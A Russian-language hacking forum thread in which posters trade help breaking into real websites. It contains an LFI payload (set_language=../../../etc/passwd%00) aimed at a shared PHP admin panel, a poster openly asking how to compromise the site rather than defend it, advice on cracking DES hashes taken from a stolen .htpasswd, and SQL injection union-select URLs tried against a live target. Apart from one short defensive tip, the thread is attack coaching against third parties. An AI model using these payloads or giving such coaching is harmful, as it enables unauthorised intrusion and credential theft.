Ваши вопросы по уязвимостям.

Выложи код той формы и тебе всё подробно расскажут)

 

попробовал загрузить картинку обычную и с шелл измененным расширением. Результат аналогичен.
Но возможно нужно что бы картинка была определенных размеров.
Еще арабский блин...

 

Фильтрует на расширение причем нулбайт не прокатывает,я бы поковырял но уж слишком до него далеко, ответ долго идет пинг большой...

 

Code:

Warning</b>:  include(phpBB2/....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../home/www/site.ru/forum//forum.php) [<a href='function.include'>function.include</a>]: failed to open stream: File name too long in <b>/home/www/site.ru/forum/forum.php</b> on line <b>292</b><br />

Тиичный инклуд с фильтрацией кавычек.Что я не так делаю ? Или тут не получится ?

 

Читай текст ошибки "File name too long" - слишком длинное имя файла =\

 

Велемир, исходники формы не достать - она в PHP, а его слить не получается.

--StraNger--, это грузинский
Может глаза замылились, добыл исходник admpan.php
Тут за что-нибудь зацепиться можно?

<?
ob_start();
session_start();
include_once("inc_all.php");

// GARSE
// checking who can enter this page
if(!$auth->grant_access_for(array(1,2,10))){ // passing array with user statuses who can enter this page
die("Access Denied for User ".$_SESSION['user_data']['user_name']);
}
// /GARSE

if ($_GET['set_language']) {
$_SESSION['admpan_lang'] = $_GET['set_language'];
header ("Location: ".$conf['site_url']."admpan.php?adm_do=".$_GET['adm_do']);
}

if (!$_SESSION['admpan_lang']) $adm_css = $conf['adminpanel_lang'];
else $adm_css = $_SESSION['admpan_lang'];

//language
require("adm_includes/lang/".$adm_css.".php");

$all_menu_types = $conf['all_menu_types'];

$all_admin_lang_ver = explode (",", $conf['admin_lang_ver']);
$adm_lan_str = '';
foreach ($all_admin_lang_ver as $v) {
if ($v==$adm_css) $cssstyle = 'style="background-color:#ff6600;"';
else $cssstyle = '';
$adm_lan_str .= '<a href="?set_language='.$v.'" '.$cssstyle.'>&nbsp;'.strtoupper($v).'&nbsp;</a>&nbsp;&nbsp;';
}

require($conf['default_skin']."adm/header.php");
switch ($_GET['adm_do']) {
case 'menu':
require("adm_includes/menu.php");
break;
case 'menu_management':
require("adm_includes/menu_management/menu_management.php");
break;
case 'users_menagement':
require("adm_includes/users/users.php");
break;
case 'site_map':
require("adm_includes/site_map.php");
break;
case 'log':
require("adm_includes/log/log_view.php");
break;
case 'banners':
require("adm_includes/banners/view_banners.php");
break;
case 'stat':
require("adm_includes/stat/stat.php");
break;
case 'system_info':
require("adm_includes/sys_info.php");
break;
case 'poll':
require("modules/poll/poll_admin.php");
break;
case 'newsletter':
require("modules/newsletter/newsletter_admin.php");
break;
case 'blocks':
require("adm_includes/blocks/blocks.php");
break;
case 'blocks_gaert':
require("_special/blocks_gaert.php");
break;
case 'parl':
require("_special/parl/adm/parl.php");
break;
case 'kan':
require("_special/kan/adm/kan.php");
break;
case 'news_main':
require("adm_includes/news_main.php");
break;
case 'users_permissions':
require("adm_includes/users_permissions.php");
break;
case 'langmng':
require("adm_includes/language_management/language_management.php");
break;
case 'log_events':
require("adm_includes/log_events.php");
break;
case 'single_pages':
require("adm_includes/adm_single_pages.php");
break;
case 'single_pages_folder':
require("adm_includes/adm_single_page_folders.php");
break;
case 'replace':
require("adm_includes/replace/replace.php");
break;
case 'rss':
require("adm_includes/rss/rss_adm.php");
break;
case 'db_management':
require("adm_includes/db_management/dumper.php");
break;
case 'currency':
require("adm_includes/currency/currency.php");
break;
default:
//require("adm_includes/default.php");
/*header ("Location: admpan_top.php?adm_do=menu_menagement");
exit;*/
require($conf['default_skin']."adm/default.php");
}
require($conf['default_skin']."adm/footer.php");
ob_end_flush();
?>

 

LFI в $_GET['set_language'] при magic_quotes_gpc=off либо при рабочем обходе со слешами

PHP:

if ($_GET['set_language']) {
  $_SESSION['admpan_lang'] = $_GET['set_language']; 
  header ("Location: ".$conf['site_url']."admpan.php?adm_do=".$_GET['adm_do']);
}
if (!$_SESSION['admpan_lang']) $adm_css =$conf['adminpanel_lang']; 
else $adm_css = $_SESSION['admpan_lang']; 

 
//language 
require("adm_includes/lang/".$adm_css.".php");

либо сразу в $_SESSION['admpan_lang'], разницы нет

 

Spyder, пропатченным я его обратно залить не смогу, что делать-то?

 

всмысле пропатченным?
и всмысле что делать?

как защититься или что?

чтобы защититься можно отредактировать скрипт, прогнав adm_css через preg_match на соответствие шаблону [a-z]
Если нет возможности редактировать(почему?) включить в пшп magic_quotes, open_basedir, safe_mod + всякую гадость, хотя я сомневаюсь что у тебя есть права на php.ini, а на сам скрипт нет, ктому же этот способ не спасёт на 100%

 

нет, как поиметь этот сайт...
У меня рутовый пасс был от сайта на том же двигле. в принципе некоторые скрипты остались.

 

.php?set_language=../../../../../../../../../../../../etc/passwd%00

дальше объяснять?

 

мне тут в репу написали про авторизацию
ну да, так насколько я пноимаю это скрипт админки, соответсвенно для эксплуатации уязвимости нужно быть залогиненым под админом

 

/home/www/www.****.com/mothers/.htaccess

/home/www/www.****.com/admin/.htpasswd

Чем расштфровать?

 

farpost, DES, можешь помучать Passwords Pro

 

чет непойму

узнаю таблицы все норм...

допустим таблица admin

узнаю колонки тож все норм...

а вот дальше появляется ошибка даж на этом моменте:

в чем проблема ???

 

попробуй UNION+SELECT+
а лучше линк в студию

 

Adm1n4eG,

1. Посмотри в какой бд таблица.
2. Сколько в ней записей.

 

Может быть что там идет например 2 гверя а при - limit+1,1 нету там столько вот и во второй запрос идет пустое значение, крч линк в студию а то так можно долго гадать.

 

union+select тож пробовал не получается(
и причем подставляю любую таблицу всеравно ошибка появляется...
пробовал пробелы + /**/ ставить...
пробовал хешировать название таблиц по разному тож не выходит (((
насчет лимита нет он тут не причем по идее ошибки не должно быть уже при
http://site.com/body.php?id=-1+union+all+select+1,2,3,4,5,6,7,8+from+admin--

DATABASE():db_handset
VERSION():5.0.27-standard-log
78 таблиц в базе

извенить линк дать не могу...

 

В какой бд таблица admin?